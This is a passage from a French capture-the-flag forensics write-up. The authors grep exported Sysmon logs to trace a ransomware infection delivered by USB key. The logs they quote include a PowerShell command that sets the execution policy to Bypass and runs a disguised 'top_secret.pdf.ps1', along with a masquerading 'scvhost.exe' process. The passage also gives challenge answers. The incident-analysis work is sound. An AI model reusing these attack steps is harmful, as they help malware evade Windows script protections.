<span class="o">-</span> <span class="n">The</span> <span class="n">ransomware</span> <span class="n">has</span> <span class="n">implemented</span> <span class="n">a</span> <span class="n">way</span> <span class="k">of</span> <span class="n">persistence</span> <span class="k">on</span> <span class="n">the</span> <span class="k">system</span><span class="p">.</span> <span class="n">What</span> <span class="k">is</span> <span class="n">the</span> <span class="n">name</span> <span class="k">of</span> <span class="n">the</span> <span class="n">file</span> <span class="n">that</span> <span class="n">will</span> <span class="n">be</span> <span class="n">executed</span> <span class="k">to</span> <span class="n">maintain</span> <span class="n">the</span> <span class="n">ransomware</span> <span class="k">on</span> <span class="n">the</span> <span class="k">system</span><span class="o">?</span>
<span class="n">Note</span><span class="p">:</span> <span class="k">To</span> <span class="k">convert</span> <span class="n">your</span> <span class="n">answers</span> <span class="k">into</span> <span class="n">flags</span><span class="p">,</span> <span class="n">you</span> <span class="n">have</span> <span class="k">to</span> <span class="n">compute</span> <span class="n">the</span> <span class="n">SHA1</span> <span class="n">hash</span> <span class="k">of</span> <span class="n">your</span> <span class="n">answer</span> <span class="o">=></span> <span class="n">ECW</span><span class="err">{</span><span class="n">SHA1</span><span class="p">(</span><span class="n">answer</span><span class="p">)</span><span class="err">}</span><span class="p">.</span>
</code></pre></div>
<h1>Nom de clé USB</h1>
<p>C'est sûrement l'étape qui nous a pris le plus de temps. N'étant pas familier avec le système de management des logs (graylog), j'ai fini par trouver un moyen d'exporter l'ensemble des logs dans un fichier CSV afin d'utiliser ce bon vieux <code>grep</code> localement.</p>
<p>Le plus dur : Où doit-on chercher pour trouver le nom d'une clé USB dans les logs d'une machine Windows ?</p>
<p>Après recherches, nous avons fini par trouver une liste de ruches du registre Windows intéressantes en rapport avec les clés USB : </p>
<table>
<thead>
<tr>
<th>Information</th>
<th>Ruche</th>
</tr>
</thead>
<tbody>
<tr>
<td>Numéro de série</td>
<td>SYSTEM\CurrentControlSet\Enum\USBSTOR</td>
</tr>
<tr>
<td>Nom de volume</td>
<td>SOFTWARE\Microsoft\Windows Portable Devices\Devices</td>
</tr>
<tr>
<td>ID de produit/vendeur</td>
<td>SYSTEM\CurrentControlSet\Enum\USB</td>
</tr>
<tr>
<td>Lettre du volume monté</td>
<td>SYSTEM\MountedDevices</td>
</tr>
</tbody>
</table>
<p>Ici, celui qui nous intéresse est <code>SOFTWARE\Microsoft\Windows Portable Devices\Devices</code>. De plus, nous cherchons une entrée log dans laquelle une valeur de ce registre est éditée (en gros quand le nom de la clé usb est sauvegardé dans le registre) :</p>
<div class="highlight"><pre><span></span><code>$ grep -E <span class="s1">'Registry value set.*SOFTWARE\\Microsoft\\Windows Portable Devices\\Devices'</span> logs.csv
<span class="s2">"2019-09-27T08:26:56.000Z"</span>,<span class="s2">"DESKTOP-F5ERMDT"</span>,<span class="s2">"SYSTEM"</span>,<span class="s2">"User"</span>,,,<span class="s2">"Registry value set (rule: RegistryEvent)"</span>,<span class="s2">"Microsoft-Windows-Sysmon/Operational"</span>,,,,<span class="s2">"MONEY"</span>,<span class="s2">"NT AUTHORITY"</span>,<span class="s2">"13"</span>,<span class="s2">"2019-09-27 10:26:57"</span>,<span class="s2">"INFO"</span>,,,<span class="s2">"01DNRX9681QWSJFZDQA7G3ZB91"</span>,,,<span class="s2">"C:\Windows\system32\DrvInst.exe"</span>,,<span class="s2">"-9223372036854775808"</span>,,,<span class="s2">"6"</span>,<span class="s2">"Registry value set:\\r\\nRuleName: \\r\\nEventType: SetValue\\r\\nUtcTime: 2"</span>,<span class="s2">"Info"</span>,<span class="s2">"0"</span>,,<span class="s2">"{6b71f96b-c7cd-5d8d-0000-00102b6b3400}"</span>,<span class="s2">"3252"</span>,,,,<span class="s2">"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}"</span>,<span class="s2">"505173"</span>,<span class="s2">"INFO"</span>,<span class="s2">"2"</span>,,,,,,<span class="s2">"event"</span>,<span class="s2">"im_msvistalog"</span>,<span class="s2">"Microsoft-Windows-Sysmon"</span>,,,,,,,,,,,,<span class="s2">"HKLM\SOFTWARE\Microsoft\Windows Portable Devices\Devices\SWD#WPDBUSENUM#_??_USBSTOR#DISK&amp;VEN_GENERIC&amp;PROD_FLASH_DISK&amp;REV_8.07#801257DC&amp;0#{53F56307-B6BF-11D0-94F2-00A0C91EFB8B}\FriendlyName"</span>,,,<span class="s2">"13"</span>,<span class="s2">"5048"</span>,<span class="s2">"S-1-5-18"</span>,<span class="s2">"2019-09-27 08:26:56.186"</span>,<span class="s2">"2"</span>
<span class="s2">"2019-09-27T08:26:56.000Z"</span>,<span class="s2">"DESKTOP-F5ERMDT"</span>,<span class="s2">"SYSTEM"</span>,<span class="s2">"User"</span>,,,<span class="s2">"Registry value set (rule: RegistryEvent)"</span>,<span class="s2">"Microsoft-Windows-Sysmon/Operational"</span>,,,,<span class="s2">"MONEY"</span>,<span class="s2">"NT AUTHORITY"</span>,<span class="s2">"13"</span>,<span class="s2">"2019-09-27 10:26:57"</span>,<span class="s2">"INFO"</span>,,,<span class="s2">"01DNRX965ESSGJP7897MG28R60"</span>,,,<span class="s2">"C:\Windows\System32\WUDFHost.exe"</span>,,<span class="s2">"-9223372036854775808"</span>,,,<span class="s2">"6"</span>,<span class="s2">"Registry value set:\\r\\nRuleName: \\r\\nEventType: SetValue\\r\\nUtcTime: 2"</span>,<span class="s2">"Info"</span>,<span class="s2">"0"</span>,,<span class="s2">"{6b71f96b-c7cf-5d8d-0000-0010b0c53400}"</span>,<span class="s2">"3252"</span>,,,,<span class="s2">"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}"</span>,<span class="s2">"505127"</span>,<span class="s2">"INFO"</span>,<span class="s2">"2"</span>,,,,,,<span class="s2">"event"</span>,<span class="s2">"im_msvistalog"</span>,<span class="s2">"Microsoft-Windows-Sysmon"</span>,,,,,,,,,,,,<span class="s2">"HKLM\SOFTWARE\Microsoft\Windows Portable Devices\Devices\SWD#WPDBUSENUM#_??_USBSTOR#DISK&amp;VEN_GENERIC&amp;PROD_FLASH_DISK&amp;REV_8.07#801257DC&amp;0#{53F56307-B6BF-11D0-94F2-00A0C91EFB8B}\FriendlyName"</span>,,,<span class="s2">"13"</span>,<span class="s2">"5048"</span>,<span class="s2">"S-1-5-18"</span>,<span class="s2">"2019-09-27 08:26:55.992"</span>,<span class="s2">"2"</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code>$ <span class="nb">echo</span> -n <span class="s2">"MONEY"</span> <span class="p">|</span> sha1sum <span class="p">|</span> sed -E <span class="s1">'s/^(.)(.*)(.) -/ECW{\1\2\3}/'</span>
ECW<span class="o">{</span>6bf...723<span class="o">}</span>
</code></pre></div>
<h1>Nom du fichier ouvert</h1>
<p>Ici, nous avons d'abord recherché quelle lettre correspondait au volume de cette clé USB grâce au registre SYSTEM\MountedDevices</p>
<p>Idem que précédemment, on recherche une entrée dans lequelle la valeur du registre est éditée, pas créée :</p>
<div class="highlight"><pre><span></span><code>$ grep <span class="s1">'Registry value set.*SYSTEM\\MountedDevices'</span> logs.csv
<span class="s2">"2019-09-27T08:26:53.000Z"</span>,<span class="s2">"DESKTOP-F5ERMDT"</span>,,,,<span class="s2">"SYSTEM"</span>,<span class="s2">"User"</span>,,<span class="s2">"Registry value set (rule: RegistryEvent)"</span>,<span class="s2">"Microsoft-Windows-Sysmon/Operational"</span>,,,,,,<span class="s2">"Binary Data"</span>,<span class="s2">"NT AUTHORITY"</span>,<span class="s2">"13"</span>,<span class="s2">"2019-09-27 10:26:54"</span>,<span class="s2">"INFO"</span>,,<span class="s2">"01DNRX93QCFM8D8B11JSRZR611"</span>,,,,<span class="s2">"System"</span>,,,<span class="s2">"-9223372036854775808"</span>,<span class="s2">"6"</span>,,,<span class="s2">"Registry value set:\\r\\nRuleName: \\r\\nEventType: SetValue\\r\\nUtcTime: 2"</span>,,,,<span class="s2">"Info"</span>,<span class="s2">"0"</span>,,,,,,,<span class="s2">"{6b71f96b-c4b3-5d8d-0000-0010eb030000}"</span>,<span class="s2">"3252"</span>,,,<span class="s2">"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}"</span>,<span class="s2">"503173"</span>,,,<span class="s2">"INFO"</span>,<span class="s2">"2"</span>,,,,,<span class="s2">"event"</span>,<span class="s2">"im_msvistalog"</span>,<span class="s2">"Microsoft-Windows-Sysmon"</span>,,,,,,,,,,,<span class="s2">"HKLM\SYSTEM\MountedDevices\\??\Volume{b04458c0-e0fe-11e9-b06f-0050569a0156}"</span>,,,<span class="s2">"13"</span>,,<span class="s2">"5048"</span>,,,<span class="s2">"S-1-5-18"</span>,<span class="s2">"2019-09-27 08:26:53.614"</span>,<span class="s2">"2"</span>
<span class="s2">"2019-09-27T08:26:53.000Z"</span>,<span class="s2">"DESKTOP-F5ERMDT"</span>,,,,<span class="s2">"SYSTEM"</span>,<span class="s2">"User"</span>,,<span class="s2">"Registry value set (rule: RegistryEvent)"</span>,<span class="s2">"Microsoft-Windows-Sysmon/Operational"</span>,,,,,,<span class="s2">"Binary Data"</span>,<span class="s2">"NT AUTHORITY"</span>,<span class="s2">"13"</span>,<span class="s2">"2019-09-27 10:26:54"</span>,<span class="s2">"INFO"</span>,,<span class="s2">"01DNRX93QD2F3WF54V03YCEZCF"</span>,,,,<span class="s2">"System"</span>,,,<span class="s2">"-9223372036854775808"</span>,<span class="s2">"6"</span>,,,<span class="s2">"Registry value set:\\r\\nRuleName: \\r\\nEventType: SetValue\\r\\nUtcTime: 2"</span>,,,,<span class="s2">"Info"</span>,<span class="s2">"0"</span>,,,,,,,<span class="s2">"{6b71f96b-c4b3-5d8d-0000-0010eb030000}"</span>,<span class="s2">"3252"</span>,,,<span class="s2">"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}"</span>,<span class="s2">"503175"</span>,,,<span class="s2">"INFO"</span>,<span class="s2">"2"</span>,,,,,<span class="s2">"event"</span>,<span class="s2">"im_msvistalog"</span>,<span class="s2">"Microsoft-Windows-Sysmon"</span>,,,,,,,,,,,<span class="s2">"HKLM\SYSTEM\MountedDevices\\DosDevices\E:"</span>,,,<span class="s2">"13"</span>,,<span class="s2">"5048"</span>,,,<span class="s2">"S-1-5-18"</span>,<span class="s2">"2019-09-27 08:26:53.614"</span>,<span class="s2">"2"</span>
</code></pre></div>
<p>A partir de la, nous avons cherché les différents processus créés impliquant un fichier contenu sur la clé</p>
<p>Pour ça, on utilise encore grep avec une regex:</p>
<div class="highlight"><pre><span></span><code>$ grep -E <span class="s1">'Process Create.*E:\\[a-zA-Z0-9_-]{1,15}\.[a-zA-Z0-9]{1,4}'</span> logs.csv
<span class="s2">"2019-09-27T08:28:01.000Z"</span>,<span class="s2">"DESKTOP-F5ERMDT"</span>,,,,<span class="s2">"SYSTEM"</span>,<span class="s2">"User"</span>,,<span class="s2">"Process Create (rule: ProcessCreate)"</span>,<span class="s2">"Microsoft-Windows-Sysmon/Operational"</span>,<span class="s2">"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&amp; 'C:\Program Files\7-Zip\7z.exe' x .\robber.pdf.7z -pazerty -aoa"""</span>,<span class="s2">"Microsoft Corporation"</span>,,<span class="s2">"E:\","</span>Windows PowerShell<span class="s2">",,"</span>NT AUTHORITY<span class="s2">","</span><span class="m">1</span><span class="s2">","</span><span class="m">2019</span>-09-27 <span class="m">10</span>:28:02<span class="s2">","</span>INFO<span class="s2">","</span><span class="m">10</span>.0.17763.1 <span class="o">(</span>WinBuild.160101.0800<span class="o">)</span><span class="s2">","</span>01DNRXB6012401ETD2VY33ZBRB<span class="s2">",,,"</span><span class="nv">SHA1</span><span class="o">=</span>6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5<span class="o">=</span>7353F60B1739074EB17C5F4DDDEFE239,SHA256<span class="o">=</span>DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH<span class="o">=</span>741776AACCFC5B71FF59832DCDCACE0F<span class="s2">","</span>C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\W</span>indowsPowerShell<span class="se">\v</span><span class="m">1</span>.0<span class="se">\p</span>owershell.exe<span class="s2">",,"</span>Medium<span class="s2">","</span>-9223372036854775808<span class="s2">","</span><span class="m">6</span><span class="s2">","</span><span class="o">{</span>6b71f96b-c4e0-5d8d-0000-00204f250900<span class="o">}</span><span class="s2">","</span>0x9254f<span class="s2">","</span>Process Create:<span class="se">\\</span>r<span class="se">\\</span>nRuleName: <span class="se">\\</span>r<span class="se">\\</span>nUtcTime: <span class="m">2019</span>-09-27 <span class="m">08</span>:28:01.639<span class="se">\\</span>r<span class="se">\\</span>nP<span class="s2">",,,,"</span>Info<span class="s2">","</span><span class="m">0</span><span class="s2">","</span>PowerShell.EXE<span class="s2">","""</span>C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\W</span>indowsPowerShell<span class="se">\v</span><span class="m">1</span>.0<span class="se">\p</span>owershell.exe<span class="s2">""</span> <span class="s2">""</span>-Command<span class="s2">""</span> <span class="s2">""</span><span class="k">if</span><span class="o">((</span>Get-ExecutionPolicy <span class="o">)</span> -ne <span class="s1">'AllSigned'</span><span class="o">)</span> <span class="o">{</span> Set-ExecutionPolicy -Scope Process Bypass <span class="o">}</span><span class="p">;</span> <span class="p">&</span>amp<span class="p">;</span> <span class="s1">'E:\top_secret.pdf.ps1'</span><span class="s2">""","</span>C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\W</span>indowsPowerShell<span class="se">\v</span><span class="m">1</span>.0<span class="se">\p</span>owershell.exe<span class="s2">","</span><span class="o">{</span>6b71f96b-c810-5d8d-0000-0010eeae3600<span class="o">}</span><span class="s2">","</span><span class="m">9072</span><span class="s2">",,"</span><span class="o">{</span>6b71f96b-c811-5d8d-0000-00105ae93600<span class="o">}</span><span class="s2">","</span><span class="m">3252</span><span class="s2">",,"</span>Microsoft® Windows® Operating System<span class="s2">","</span><span class="o">{</span>5770385F-C22A-43E0-BF4C-06F5698FFBD9<span class="o">}</span><span class="s2">","</span><span class="m">510624</span><span class="s2">",,,"</span>INFO<span class="s2">","</span><span class="m">2</span><span class="s2">",,,,,"</span>event<span class="s2">","</span>im_msvistalog<span class="s2">","</span>Microsoft-Windows-Sysmon<span class="s2">",,,,,,,,,,,,,,"</span><span class="m">1</span><span class="s2">","</span><span class="m">1</span><span class="s2">","</span><span class="m">5048</span><span class="s2">",,"</span>DESKTOP-F5ERMDT<span class="se">\r</span>obert<span class="s2">","</span>S-1-5-18<span class="s2">","</span><span class="m">2019</span>-09-27 <span class="m">08</span>:28:01.639<span class="s2">","</span><span class="m">5</span><span class="s2">"</span>
<span class="s2">"</span><span class="m">2019</span>-09-27T08:28:12.000Z<span class="s2">","</span>DESKTOP-F5ERMDT<span class="s2">",,,,"</span>SYSTEM<span class="s2">","</span>User<span class="s2">",,"</span>Process Create <span class="o">(</span>rule: ProcessCreate<span class="o">)</span><span class="s2">","</span>Microsoft-Windows-Sysmon/Operational<span class="s2">","""</span>E:<span class="se">\s</span>cvhost.exe<span class="s2">""","</span>?<span class="s2">",,"</span>E:<span class="se">\"</span>,<span class="s2">"?"</span>,,<span class="s2">"NT AUTHORITY"</span>,<span class="s2">"1"</span>,<span class="s2">"2019-09-27 10:28:13"</span>,<span class="s2">"INFO"</span>,<span class="s2">"?"</span>,<span class="s2">"01DNRXBGJ64GV4QYSY9QHDF8Q6"</span>,,,<span class="s2">"SHA1=AB46FD10A9562CDDA95B0EB5DD475BC5E41DA55E,MD5=79F0ED40895935BFF57D763B63B77DA2,SHA256=F20AC7A598D2BDC4FE4F1936BFCB5C0A0406A4E66D292578783B77552F7E5F3C,IMPHASH=FC40519AF20116C903E3FF836E366E39"</span>,<span class="s2">"E:\scvhost.exe"</span>,,<span class="s2">"Medium"</span>,<span class="s2">"-9223372036854775808"</span>,<span class="s2">"6"</span>,<span class="s2">"{6b71f96b-c4e0-5d8d-0000-00204f250900}"</span>,<span class="s2">"0x9254f"</span>,<span class="s2">"Process Create:\\r\\nRuleName: \\r\\nUtcTime: 2019-09-27 08:28:12.226\\r\\nP"</span>,,,,<span class="s2">"Info"</span>,<span class="s2">"0"</span>,<span class="s2">"?"</span>,<span class="s2">"""E:\scvhost.exe"""</span>,<span class="s2">"E:\scvhost.exe"</span>,<span class="s2">"{6b71f96b-c81b-5d8d-0000-0010ed433700}"</span>,<span class="s2">"8312"</span>,,<span class="s2">"{6b71f96b-c81c-5d8d-0000-0010e1493700}"</span>,<span class="s2">"3252"</span>,,<span class="s2">"?"</span>,<span class="s2">"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}"</span>,<span class="s2">"511750"</span>,,,<span class="s2">"INFO"</span>,<span class="s2">"2"</span>,,,,,<span class="s2">"event"</span>,<span class="s2">"im_msvistalog"</span>,<span class="s2">"Microsoft-Windows-Sysmon"</span>,,,,,,,,,,,,,,<span class="s2">"1"</span>,<span class="s2">"1"</span>,<span class="s2">"5048"</span>,,<span class="s2">"DESKTOP-F5ERMDT\robert"</span>,<span class="s2">"S-1-5-18"</span>,<span class="s2">"2019-09-27 08:28:12.226"</span>,<span class="s2">"5"</span>
<span class="o">[</span>...<span class="o">]</span>
<span class="s2">"2019-09-27T08:28:11.000Z"</span>,<span class="s2">"DESKTOP-F5ERMDT"</span>,,,,<span class="s2">"SYSTEM"</span>,<span class="s2">"User"</span>,,<span class="s2">"Process Create (rule: ProcessCreate)"</span>,<span class="s2">"Microsoft-Windows-Sysmon/Operational"</span>,<span class="s2">"""E:\scvhost.exe"""</span>,<span class="s2">"?"</span>,,<span class="s2">"E:\","</span>?<span class="s2">",,"</span>NT AUTHORITY<span class="s2">","</span><span class="m">1</span><span class="s2">","</span><span class="m">2019</span>-09-27 <span class="m">10</span>:28:12<span class="s2">","</span>INFO<span class="s2">","</span>?<span class="s2">","</span>01DNRXBFGMQ28DXDKZ2H3KNJJE<span class="s2">",,,"</span><span class="nv">SHA1</span><span class="o">=</span>AB46FD10A9562CDDA95B0EB5DD475BC5E41DA55E,MD5<span class="o">=</span>79F0ED40895935BFF57D763B63B77DA2,SHA256<span class="o">=</span>F20AC7A598D2BDC4FE4F1936BFCB5C0A0406A4E66D292578783B77552F7E5F3C,IMPHASH<span class="o">=</span>FC40519AF20116C903E3FF836E366E39<span class="s2">","</span>E:<span class="se">\s</span>cvhost.exe<span class="s2">",,"</span>Medium<span class="s2">","</span>-9223372036854775808<span class="s2">","</span><span class="m">6</span><span class="s2">","</span><span class="o">{</span>6b71f96b-c4e0-5d8d-0000-00204f250900<span class="o">}</span><span class="s2">","</span>0x9254f<span class="s2">","</span>Process Create:<span class="se">\\</span>r<span class="se">\\</span>nRuleName: <span class="se">\\</span>r<span class="se">\\</span>nUtcTime: <span class="m">2019</span>-09-27 <span class="m">08</span>:28:11.717<span class="se">\\</span>r<span class="se">\\</span>nP<span class="s2">",,,,"</span>Info<span class="s2">","</span><span class="m">0</span><span class="s2">","</span>?<span class="s2">","""</span>C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\W</span>indowsPowerShell<span class="se">\v</span><span class="m">1</span>.0<span class="se">\p</span>owershell.exe<span class="s2">""</span> <span class="s2">""</span>-Command<span class="s2">""</span> <span class="s2">""</span><span class="k">if</span><span class="o">((</span>Get-ExecutionPolicy <span class="o">)</span> -ne <span class="s1">'AllSigned'</span><span class="o">)</span> <span class="o">{</span> Set-ExecutionPolicy -Scope Process Bypass <span class="o">}</span><span class="p">;</span> <span class="p">&</span>amp<span class="p">;</span> <span class="s1">'E:\top_secret.pdf.ps1'</span><span class="s2">""","</span>C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\W</span>indowsPowerShell<span class="se">\v</span><span class="m">1</span>.0<span class="se">\p</span>owershell.exe<span class="s2">","</span><span class="o">{</span>6b71f96b-c810-5d8d-0000-0010eeae3600<span class="o">}</span><span class="s2">","</span><span class="m">9072</span><span class="s2">",,"</span><span class="o">{</span>6b71f96b-c81b-5d8d-0000-0010ed433700<span class="o">}</span><span class="s2">","</span><span class="m">3252</span><span class="s2">",,"</span>?<span class="s2">","</span><span class="o">{</span>5770385F-C22A-43E0-BF4C-06F5698FFBD9<span class="o">}</span><span class="s2">","</span><span class="m">511649</span><span class="s2">",,,"</span>INFO<span class="s2">","</span><span class="m">2</span><span class="s2">",,,,,"</span>event<span class="s2">","</span>im_msvistalog<span class="s2">","</span>Microsoft-Windows-Sysmon<span class="s2">",,,,,,,,,,,,,,"</span><span class="m">1</span><span class="s2">","</span><span class="m">1</span><span class="s2">","</span><span class="m">5048</span><span class="s2">",,"</span>DESKTOP-F5ERMDT<span class="se">\r</span>obert<span class="s2">","</span>S-1-5-18<span class="s2">","</span><span class="m">2019</span>-09-27 <span class="m">08</span>:28:11.717<span class="s2">","</span><span class="m">5</span><span class="s2">"</span>
<span class="s2">"</span><span class="m">2019</span>-09-27T08:29:12.000Z<span class="s2">","</span>DESKTOP-F5ERMDT<span class="s2">",,,,"</span>SYSTEM<span class="s2">","</span>User<span class="s2">",,"</span>Process Create <span class="o">(</span>rule: ProcessCreate<span class="o">)</span><span class="s2">","</span>Microsoft-Windows-Sysmon/Operational<span class="s2">","""</span>C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32<span class="se">\N</span>OTEPAD.EXE<span class="s2">""</span> E:<span class="se">\p</span>s.txt<span class="s2">","</span>Microsoft Corporation<span class="s2">",,"</span>E:<span class="se">\"</span>,<span class="s2">"Notepad"</span>,,<span class="s2">"NT AUTHORITY"</span>,<span class="s2">"1"</span>,<span class="s2">"2019-09-27 10:29:12"</span>,<span class="s2">"INFO"</span>,<span class="s2">"10.0.17763.1 (WinBuild.160101.0800)"</span>,<span class="s2">"01DNRXDADQ72NPK4NJ0BMXX21V"</span>,,,<span class="s2">"SHA1=60733DE225B5C4BFC42FB79E5D1A4F6683243E4A,MD5=782877B30735ABD1EAE241F13145F664,SHA256=E46B3CA5A0EBB4A6979F852F50E22BD08C9F2D0206CC04383978BE0172AC88EE,IMPHASH=C8922BE3DCDFEB5994C9EEE7745DC22E"</span>,<span class="s2">"C:\Windows\System32\notepad.exe"</span>,,<span class="s2">"Medium"</span>,<span class="s2">"-9223372036854775808"</span>,<span class="s2">"6"</span>,<span class="s2">"{6b71f96b-c4e0-5d8d-0000-00204f250900}"</span>,<span class="s2">"0x9254f"</span>,<span class="s2">"Process Create:\\r\\nRuleName: \\r\\nUtcTime: 2019-09-27 08:29:12.216\\r\\nP"</span>,,,,<span class="s2">"Info"</span>,<span class="s2">"0"</span>,<span class="s2">"NOTEPAD.EXE"</span>,<span class="s2">"C:\Windows\Explorer.EXE"</span>,<span class="s2">"C:\Windows\explorer.exe"</span>,<span class="s2">"{6b71f96b-c4e5-5d8d-0000-001074f30a00}"</span>,<span class="s2">"5320"</span>,,<span class="s2">"{6b71f96b-c858-5d8d-0000-00109a9c4000}"</span>,<span class="s2">"3252"</span>,,<span class="s2">"Microsoft® Windows® Operating System"</span>,<span class="s2">"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}"</span>,<span class="s2">"534488"</span>,,,<span class="s2">"INFO"</span>,<span class="s2">"2"</span>,,,,,<span class="s2">"event"</span>,<span class="s2">"im_msvistalog"</span>,<span class="s2">"Microsoft-Windows-Sysmon"</span>,,,,,,,,,,,,,,<span class="s2">"1"</span>,<span class="s2">"1"</span>,<span class="s2">"5048"</span>,,<span class="s2">"DESKTOP-F5ERMDT\robert"</span>,<span class="s2">"S-1-5-18"</span>,<span class="s2">"2019-09-27 08:29:12.216"</span>,<span class="s2">"5"</span>
</code></pre></div>
<p>On remarque le lancement d'un script PowerShell avec un <code>Set-ExecutionPolicy</code> :</p>
<div class="highlight"><pre><span></span><code>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ""-Command"" ""if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; &amp; 'E:\top_secret.pdf.ps1'
</code></pre></div>
<p>On a donc le nom du fichier lancé à l'origine du ransomware : <code>top_secret.pdf.ps1</code>.</p>
<p>Comme avant, on fait un <code>sha1sum</code> sur le nom :</p>
<div class="highlight"><pre><span></span><code>$ <span class="nb">echo</span> -n <span class="s2">"top_secret.pdf.ps1"</span> <span class="p">|</span> sha1sum <span class="p">|</span> sed -E <span class="s1">'s/^(.)(.*)(.) -/ECW{\1\2\3}/'</span>
ECW<span class="o">{</span>7d8...963<span class="o">}</span>
</code></pre></div>
<h1>Nombre de fichiers chiffrés</h1>
<p>Nous avons d'abord regardé les entrées de logs associées au fichier à l'origine du ransomware :</p>
<div class="highlight"><pre><span></span><code>$ grep <span class="s1">'top_secret.pdf.ps1'</span> logs.csv
<span class="s2">"2019-09-27T08:28:00.000Z"</span>,<span class="s2">"DESKTOP-F5ERMDT"</span>,,,,<span class="s2">"SYSTEM"</span>,<span class="s2">"User"</span>,,<span class="s2">"File created (rule: FileCreate)"</span>,<span class="s2">"Microsoft-Windows-Sysmon/Operational"</span>,,,<span class="s2">"2019-09-27 08:28:00.834"</span>,,,,<span class="s2">"NT AUTHORITY"</span>,<span class="s2">"11"</span>,<span class="s2">"2019-09-27 10:28:01"</span>,<span class="s2">"INFO"</span>,,<span class="s2">"01DNRXB4NXAGTKA4E73B89R1MF"</span>,,,,<span class="s2">"C:\Windows\Explorer.EXE"</span>,,,<span class="s2">"-9223372036854775808"</span>,<span class="s2">"6"</span>,,,<span class="s2">"File created:\\r\\nRuleName: \\r\\nUtcTime: 2019-09-27 08:28:00.834\\r\\nPro"</span>,,,,<span class="s2">"Info"</span>,<span class="s2">"0"</span>,,,,,,,<span class="s2">"{6b71f96b-c4e5-5d8d-0000-001074f30a00}"</span>,<span class="s2">"3252"</span>,,,<span class="s2">"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}"</span>,<span class="s2">"510159"</span>,,,<span class="s2">"INFO"</span>,<span class="s2">"2"</span>,,,,,<span class="s2">"event"</span>,<span class="s2">"im_msvistalog"</span>,<span class="s2">"Microsoft-Windows-Sysmon"</span>,,,,,,,,,<span class="s2">"C:\Users\robert\AppData\Roaming\Microsoft\Windows\Recent\top_secret.pdf.ps1.lnk"</span>,,,,,<span class="s2">"11"</span>,,<span class="s2">"5048"</span>,,,<span class="s2">"S-1-5-18"</span>,<span class="s2">"2019-09-27 08:28:00.834"</span>,<span class="s2">"2"</span>
<span class="s2">"2019-09-27T08:28:01.000Z"</span>,<span class="s2">"DESKTOP-F5ERMDT"</span>,,,,<span class="s2">"SYSTEM"</span>,<span class="s2">"User"</span>,,<span class="s2">"Process Create (rule: ProcessCreate)"</span>,<span class="s2">"Microsoft-Windows-Sysmon/Operational"</span>,<span class="s2">"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -c ""&amp; 'C:\Program Files\7-Zip\7z.exe' x .\robber.pdf.7z -pazerty -aoa"""</span>,<span class="s2">"Microsoft Corporation"</span>,,<span class="s2">"E:\","</span>Windows PowerShell<span class="s2">",,"</span>NT AUTHORITY<span class="s2">","</span><span class="m">1</span><span class="s2">","</span><span class="m">2019</span>-09-27 <span class="m">10</span>:28:02<span class="s2">","</span>INFO<span class="s2">","</span><span class="m">10</span>.0.17763.1 <span class="o">(</span>WinBuild.160101.0800<span class="o">)</span><span class="s2">","</span>01DNRXB6012401ETD2VY33ZBRB<span class="s2">",,,"</span><span class="nv">SHA1</span><span class="o">=</span>6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5<span class="o">=</span>7353F60B1739074EB17C5F4DDDEFE239,SHA256<span class="o">=</span>DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH<span class="o">=</span>741776AACCFC5B71FF59832DCDCACE0F<span class="s2">","</span>C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\W</span>indowsPowerShell<span class="se">\v</span><span class="m">1</span>.0<span class="se">\p</span>owershell.exe<span class="s2">",,"</span>Medium<span class="s2">","</span>-9223372036854775808<span class="s2">","</span><span class="m">6</span><span class="s2">","</span><span class="o">{</span>6b71f96b-c4e0-5d8d-0000-00204f250900<span class="o">}</span><span class="s2">","</span>0x9254f<span class="s2">","</span>Process Create:<span class="se">\\</span>r<span class="se">\\</span>nRuleName: <span class="se">\\</span>r<span class="se">\\</span>nUtcTime: <span class="m">2019</span>-09-27 <span class="m">08</span>:28:01.639<span class="se">\\</span>r<span class="se">\\</span>nP<span class="s2">",,,,"</span>Info<span class="s2">","</span><span class="m">0</span><span class="s2">","</span>PowerShell.EXE<span class="s2">","""</span>C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\W</span>indowsPowerShell<span class="se">\v</span><span class="m">1</span>.0<span class="se">\p</span>owershell.exe<span class="s2">""</span> <span class="s2">""</span>-Command<span class="s2">""</span> <span class="s2">""</span><span class="k">if</span><span class="o">((</span>Get-ExecutionPolicy <span class="o">)</span> -ne <span class="s1">'AllSigned'</span><span class="o">)</span> <span class="o">{</span> Set-ExecutionPolicy -Scope Process Bypass <span class="o">}</span><span class="p">;</span> <span class="p">&</span>amp<span class="p">;</span> <span class="s1">'E:\top_secret.pdf.ps1'</span><span class="s2">""","</span>C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\W</span>indowsPowerShell<span class="se">\v</span><span class="m">1</span>.0<span class="se">\p</span>owershell.exe<span class="s2">","</span><span class="o">{</span>6b71f96b-c810-5d8d-0000-0010eeae3600<span class="o">}</span><span class="s2">","</span><span class="m">9072</span><span class="s2">",,"</span><span class="o">{</span>6b71f96b-c811-5d8d-0000-00105ae93600<span class="o">}</span><span class="s2">","</span><span class="m">3252</span><span class="s2">",,"</span>Microsoft® 